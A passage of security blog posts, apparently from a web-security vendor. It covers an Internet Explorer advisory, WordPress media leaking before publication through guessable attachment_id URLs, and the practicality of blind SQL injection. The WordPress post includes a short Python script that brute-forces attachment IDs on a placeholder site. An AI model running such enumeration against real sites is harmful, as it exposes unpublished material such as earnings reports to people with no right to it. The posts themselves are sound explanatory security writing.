The scope of users affected is very high, since Microsoft Windows operating systems and Internet Explorer have been the de facto standard for more than a decade. Since Internet Explorer ships as the only browser in Windows, it’s very easy not to bother installing a different browser. Internet Explorer still accounts for roughly a third of browser usage on average when compared against Chrome and Firefox.

Internet Explorer on Windows Server versions above 2003 is at lower risk because it runs in Enhanced Security Configuration by default, and browsing the Internet from a Windows server (or any server, for that matter) is strongly discouraged.

Solution:

Patching can be a hectic task for admins whose environments depend heavily on Internet Explorer, but it should be done immediately to prevent exposure.

The official instructions from Microsoft are listed under “Suggested Actions”:

General Information for all users

Enhanced Mitigation Experience ToolKit

Here are some statistical results showing browser and operating system usage across the world:

https://www.statcounter.com

https://www.netmarketshare.com

https://www.w3counter.com

https://www.sitepoint.com


Reducing Security

Jeremiah Grossman and I were chatting (yes, we talk quite often) at BlackHat about how it seems like no matter what we do in the security space it is reducible to being insecure/vulnerable in some way or another. So Jeremiah suggested that I should make a funny graphic depicting how that’s true.

Well, that turned out to be easier said than done. As I got further and further into it, I found that it wasn’t really that funny. In fact, it became less-funny and more of a bummer the more I got into it. I know this isn’t perfect or complete, but it gives you an idea of the amazing amount of things you’ve got to get right before you can be sure your site is safe.

Click to enlarge.

Hopefully after you look at it you’ll see what I mean. What was once a pretty funny idea turned into a bit of a nightmare. Still, I suppose there is a bit of gory humor buried deep within it all. Okay, I’m going to go away and grow carrots now.

Information Leakage in WordPress

WordPress suffers from a fairly minor flaw that attackers can use without much difficulty. WordPress flaws have been numerous over the years – everything from command injection and SQL injection to XSS and CSRF. One of my favorite issues has always been information leakage, because it’s the one that’s always marked as low severity and that no one ever takes seriously. That said, it’s still an exploit that could be disastrous in some circumstances.

WordPress has an upload process for media that is separate from the blog posting process, so the two aren’t governed by the same authorization rules. Once something is uploaded as media, it is instantly visible on the site, regardless of whether the associated blog post has been published yet.

Additionally, the URLs used by the blog are extremely easy to brute force, because each new attachment_id is always larger than the last by some amount. The actual increment depends on how many posts are in the database, not just on media uploads, so it does take a tiny bit of work to know when to stop looking. But the URLs consistently look like this:

/?attachment_id=4
/?attachment_id=130
/?attachment_id=131
/?attachment_id=249
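To illustrate how little effort that brute force takes, here is a minimal sketch (hypothetical site URL, my own code, using the requests library) that walks candidate attachment_id values and records which ones already serve content:

import requests

BASE = "http://example-wordpress-site/?attachment_id={}"

def find_live_attachments(max_id=300):
    # Return the attachment IDs that already respond with a page
    live = []
    for attachment_id in range(1, max_id + 1):
        response = requests.get(BASE.format(attachment_id), allow_redirects=True)
        if response.status_code == 200:
            live.append(attachment_id)
    return live

print(find_live_attachments())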

Now you’re asking yourself, so what? The problem is that because the timing between the media upload and the blog post isn’t identical, you can end up in a race condition with the content. For instance, let’s say you run a publicly traded company and you are about to release your earnings report on your blog. You may upload a PDF of the earnings report a day or several days in advance to make sure everything is perfect and ready to go when you announce. In this case an adversary can guess the URL for the PDF of your earnings report and download it potentially days in advance. This would allow them to trade ahead of your company’s earnings report.

Another example is where a blog post is internally contentious and needs a lot of editing. It may take months for a big company to decide that a post is ready to go. But in that timeframe an attacker may identify the cited uploaded media – images, movies, PDF documents, Word documents, Excel spreadsheets, HTML and so on. This can give an adversary a great deal of information before you’re ready to disclose it. This can be used for anti-competitive practices, or simply to predict the features of the next gadget your company is producing.

So yes, minor issue, but definitely one to be aware of if you use WordPress.

Blind SQL Injection – What is it Good For?

For those of you who managed to make it to the webcast on the 20th with Matt Johansen and me, you heard quite a bit about a blackhat’s perspective on SQL injection and blind SQL injection. But I thought it would be worthwhile to write it down here as well, for those who missed it or don’t have the time to listen to the whole thing.

Internally at WhiteHat we’ve had the long-standing belief that blind SQL injection is rarely if ever actually used in attacks. We hear a lot about blind SQL injection at conferences, in papers and while talking with researchers, but we just don’t hear about it being used. Sure, there may be one piece of anecdotal evidence somewhere, but as a general class of attack it doesn’t seem to be a favorite of attackers. The reason being? It’s hard to use.

With our theory in hand we asked our former blackhat friend “Adam” to comment on his perspective. While he believed it was indeed a vulnerability and should be fixed, he wasn’t aware of any regular use of it. He felt that it was a useful exploit but took way too long and was too difficult to use compared to just about any other exploit. So while it may be useful for some things, it’s just impractical compared to the vast number of other ways to attack a web application.

Even though SQL injection and blind SQL injection have nearly the same damage potential, almost no one other than state-sponsored attackers would bother with blind SQL injection outside of a penetration test or vulnerability scan. There are just too many other ways to break into a site in most cases (trust me). Some tools try to make the process easier, but it can still be a huge pain depending on what we’re talking about. Plus, it takes many orders of magnitude more requests to dump a database with blind SQL injection. Having to make many requests means more time and more risk of getting caught – you stick out like a sore thumb. Conversely, regular SQL injection is still one of the most widely used vulnerabilities, by exactly the same logic – it’s easy to use.

So what is blind SQL injection actually good for? Is there any circumstance where it’s really worthwhile to bother? Yes – let’s say just a few rows need to be extracted (admin passwords, for instance). Gaining access to a handful of rows might only represent a few hundred requests – well below the radar. Something like an admin password could then be used in another attack, which makes the process of exploitation much easier. So I would never claim that it’s not worth fixing – and neither would Adam. Update: as @bonsaiviking pointed out, command injection is another valid use case if you can achieve it.
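To put rough numbers on that trade-off, here is a back-of-the-envelope sketch (the figures are assumptions, not measurements) of why a handful of rows stays under the radar while a full dump does not: with boolean-based blind SQL injection, each unknown character costs roughly log2(charset) yes/no requests.

import math

charset_size = 95                                        # printable ASCII
requests_per_char = math.ceil(math.log2(charset_size))   # about 7 boolean requests per character

admin_password_hash = 32                                 # one 32-character hash: the "few rows" case
modest_table_dump = 1_000_000                            # around a million characters for even a small full dump

print(requests_per_char * admin_password_hash)           # ~224 requests: plausibly unnoticed
print(requests_per_char * modest_table_dump)             # ~7,000,000 requests: you stick out like a sore thumb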

Getting our theories affirmed is useful for helping us tune Sentinel to be a smarter scanner and prioritize attacks over time.